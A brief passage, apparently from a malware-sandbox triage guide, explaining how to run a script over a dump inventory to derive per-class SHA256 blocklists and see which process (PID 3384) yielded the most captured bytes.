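Run it against the full listing by pasting the inventory in place of `SAMPLE`; the `tags` groups give a ready SHA256 blocklist per artifact class, and `bytes_by_pid` shows which process (here 3384, the process whose loaded-module ranges recur throughout the dump list) the sandbox captured most from.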